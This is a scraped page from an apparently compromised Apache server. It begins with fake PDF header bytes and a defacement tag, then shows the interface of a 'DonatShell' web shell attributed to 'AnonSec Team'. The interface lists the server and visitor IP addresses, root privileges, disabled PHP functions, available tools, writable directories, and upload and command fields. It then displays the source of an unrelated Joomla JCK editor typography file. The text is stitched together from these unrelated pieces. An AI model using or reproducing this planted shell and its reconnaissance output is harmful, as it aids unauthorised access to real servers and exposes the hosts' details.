%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/11584/root/var/www/html/old/plugins/editors/jckeditor/fields/modals/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/11584/root/var/www/html/old/plugins/editors/jckeditor/fields/modals/typography.php
<?php
/*------------------------------------------------------------------------
# Copyright (C) 2005-2012 WebxSolution Ltd. All Rights Reserved.
# @license - GPLv2.0
# Author: WebxSolution Ltd
# Websites:  http://www.webxsolution.com
# Terms of Use: An extension that is derived from the JoomlaCK editor will only be allowed under the following conditions: http://joomlackeditor.com/terms-of-use
# ------------------------------------------------------------------------*/ 
?>
<html>
<head>
<title>JCK Typography</title>
<link rel="stylesheet" href="js/typography/lib/codemirror.css">
<script src="js/typography/lib/codemirror.js" type="text/javascript"></script>
<script src="js/typography/lib/foldcode.js" type="text/javascript"></script>
<link rel="stylesheet" href="js/typography/theme/default.css">
<script src="js/typography/lib/searchcodemirror.js" type="text/javascript"></script>
<link rel="stylesheet" href="js/typography/lib/dialog.css">
<!--[if IE]>
 <link rel="stylesheet" href="css/typography/modal_ie.css" type="text/css" />
<![endif]-->
<style type="text/css">
      .CodeMirror {border:1px solid silver;}
      .activeline {background: #f0fcff !important;}
	  .CodeMirror-gutter {
		min-width: 3em; 
		cursor: pointer;	
		background-image: url("js/typography/images/line.png");
		background-repeat: repeat-y;
		background-position: 25px 50%;
		}
	  .CodeMirror-gutter-text { padding:0px; padding-top: 0.4em;text-align: right;}
	  .CodeMirror-gutter-text pre { 
		display: block;
		background-repeat: no-repeat;
		background-position: 25px 50%
		}
	 .CodeMirror-gutter-text pre.openfold {	background-image: url("js/typography/images/open.png");}
	 .CodeMirror-gutter-text pre.closefold {	background-image: url("js/typography/images/close.png");}
	 .CodeMirror-gutter-text pre span{padding-right:5px;}
	 .CodeMirror-searching { background: none repeat scroll 0 0 #FFFFAA;}
	
</style>

<!--[if IE]>
<style>
 .CodeMirror-gutter,.CodeMirror-gutter-text pre {background-position: 32px 50%;}
</style>	   
<![endif]-->
<script src="../../../../../media/system/js/mootools.js"  type="text/javascript"></script>
</head>
<body style="margin:0px;">
<textarea id="editarea" style="width:640px;height:478px;border:1px solid silver;overflow:auto"> </textarea>
<script type="text/javascript">
		var parentDoc =  window.parent.document,
			parentWin =	 window.parent;
			textarea =  parentDoc.getElementById('jform_params_jcktypographycontent') ||  parentDoc.getElementById('paramsjcktypographycontent'),
			editibleArea = document.getElementById('editarea');
			editibleArea.value =  textarea && textarea.value || '';
			
			
			
			
		
	
		function onclose()
		{
			codemirror.toTextArea() //copy content back to textarea
			textarea.value = editibleArea.value;
			parentWin.SqueezeBox.removeEvent('onClose',this);
		}
		parentWin && parentWin.SqueezeBox.addEvent('onClose',onclose);
		
		 var foldFunc = CodeMirror.newFoldFunction(CodeMirror.braceRangeFinder);
		  function keyEvent(cm, e) {
			if (e.keyCode == 81 && (e.ctrlKey || e.metaKey) ) {
			  if (e.type == "keydown") {
				e.stop();
				setTimeout(function() {foldFunc(cm, cm.getCursor().line);}, 50);
			  }
			  return true;
			}
			
			if (e.keyCode == 70 && (e.ctrlKey || e.metaKey) ) { //'ctrl-f'
			  if (e.type == "keydown") {
				e.stop();
				CodeMirror.commands.find(cm);
			  }
			  return true;
			}
			
			
			if (e.keyCode == 71 && (e.ctrlKey || e.metaKey) ) { //'ctrl-g'
			  if (e.type == "keydown") {
				e.stop();
				CodeMirror.commands.findNext(cm);
			  }
			  return true;
			}
			
			if (e.keyCode == 71 && (e.ctrlKey  || e.metaKey) && e.shiftKey) { //'ctrl-shft-g'
			  if (e.type == "keydown") {
				e.stop();
				CodeMirror.commands.findPrev(cm);
			  }
			  return true;
			}
			
			if (e.keyCode == 82 && (e.ctrlKey  || e.metaKey)) { //'ctrl-r'
			  if (e.type == "keydown") {
				e.stop();
				CodeMirror.commands.replace(cm);
			  }
			  return true;
			}
					
			if (e.keyCode == 82 && (e.ctrlKey  || e.metaKey) && e.shiftKey) { //'ctrl-shft-r'
			  if (e.type == "keydown") {
				e.stop();
				CodeMirror.commands.replaceAll(cm);
			  }
			  return true;
			}
			
			if (e.keyCode == 27) { //'Esc'
			  if (e.type == "keydown") {
				e.stop();
				CodeMirror.commands.clearSearch(cm);
			  }
			  return true;
			}
			
		
		  }
		
		var codemirror = CodeMirror.fromTextArea(document.getElementById("editarea"),
		{
			lineNumbers: true,
			matchBrackets: true,
			lineWrapping: true,
			firstLineNumber : '<span>&nbsp;</span>',
			onGutterClick: foldFunc,
			onKeyEvent: keyEvent,
			onCursorActivity: function() 
			{
				codemirror.setLineClass(hlLine, null);
				hlLine = codemirror.setLineClass(codemirror.getCursor().line, "activeline");
			}	
		});
		var hlLine = 0;
		(function(codemirror) 
		{
			lineTotal = codemirror.lineCount();
			for(i = 0; i < lineTotal;i++)
			{
				
				if(CodeMirror.braceRangeFinder(codemirror,i))
				{
					codemirror.setMarker(i,'%N%','closefold');
				}
			}	
		}
		)(codemirror);
		
</script>
</body>
</html>

Anon7 - 2022
AnonSec Team